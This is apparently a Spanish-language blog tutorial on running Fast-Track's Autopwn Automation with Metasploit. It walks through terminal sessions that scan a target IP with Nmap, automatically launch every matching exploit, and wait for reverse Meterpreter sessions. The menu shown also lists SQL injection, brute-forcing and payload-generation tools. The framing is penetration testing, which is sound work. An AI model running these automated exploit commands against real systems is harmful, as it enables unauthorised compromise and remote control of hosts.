[Fast-Track + Metasploit] Autopwn Automation
[Metasploit] By: Shell Root
Fast-Track es un proyecto basado en Python de código abierto destinado a ayudar a los Pent-Test en un esfuerzo por identificar, explotar y además penetrar en una red.
Fast-Track utiliza una gran parte de la
Metasploit Framework para terminar los ataques con éxito.
Fast Track tiene una amplia variedad de ataques únicos que le permiten utilizar el marco de Metasploit a su máximo potencial.
Como alguna vez miramos en estos 2 Articulos.
Al momento de escanear y obtener resultados contundentes con el Scanner
Nessus And/
Or Nmap, podremos hacer uso del Comando
Autopwn, ahora
que es lo que hace Autopwn Automation? Esto lo que hace es automatizar todos los pasos anteriores con tan solo poner la IP. Parece un poco
Lammer, pero es una gran opción, al momento de realizar varios
Test de Penetración en diferentes sistemas computacionales. Miremos.
Ejecutamos el Script
Fast-Track.py y damos como parametros el modo para interactuar.
Recordad:- -c (Command Line Mode)
- -g (Web GUI Mode)
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py
[sudo] password for shellroot:
Psyco not detected....Recommend installing it for increased speeds.
----------------------------------------------------------------
Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...
Automated Penetration Testing
Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com
Wiki and Bug Track: http://www.thepentest.com
Please read the README and LICENSE before using
this tool for acceptable use and modifications.
----------------------------------------------------------------
Modes:
Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g
Examples: ./fast-track.py -i
./fast-track.py -c
./fast-track.py -g
./fast-track.py -g <portnum>
Usage: ./fast-track.py <mode>
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
Psyco not detected....Recommend installing it for increased speeds.
----------------------------------------------------------------
Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...
Automated Penetration Testing
Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com
Wiki and Bug Track: http://www.thepentest.com
Please read the README and LICENSE before using
this tool for acceptable use and modifications.
----------------------------------------------------------------
Modes:
Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g
Examples: ./fast-track.py -i
./fast-track.py -c
./fast-track.py -g
./fast-track.py -g <portnum>
Usage: ./fast-track.py <mode>
************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************
**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST (setup.py) ****
Visit http://trac.thepentest.com for tutorials or to file a bug.
1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About
Usage: fast-track.py -c <tool#>
shellroot@shellroot-desktop:~/fasttrack$
Seleccionamos el item
Autopwn Automationshellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2
Metasploit Autopwn Automated
Metasploit's Autopwn Function can require some knowledge in order
to set it up. Fast-Track tries to simplify that.
Simply type ./fast-track -c 2 <ipaddr or range> <-r or -b> (reverse or bind) to launch the exploits.
Usage: ./fast-track.py -c 2 <iprange> <-r or -b> <--reverse or bind
Examples: ./fast-track.py -c 2 192.168.1.1-254 -b
./fast-track.py -c 2 "-PN 192.168.1.1-254" -r
./fast-track.py -c 2 "-T 1 192.168.1.1/24" -r
shellroot@shellroot-desktop:~/fasttrack$
Miramos y Asignamos parametros son necesarios para correr el Exploit Automatizado.
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2 192.168.0.2 -r
Se creará una
"Base de Datos", de nombre
Pentest, y se ejecutará el
Nmap con el
Parametro IP o
Rango Asignado. Ahora hará uso del comando
Autopwn y esperametros a que termine de verificar los Exploit que pueden ser ejecutados por las vulnerabilidades encontradas en el sistema. Por ultimo esperaremos que nos entregue las sessiones el
Meterpreter.
By: Shell Root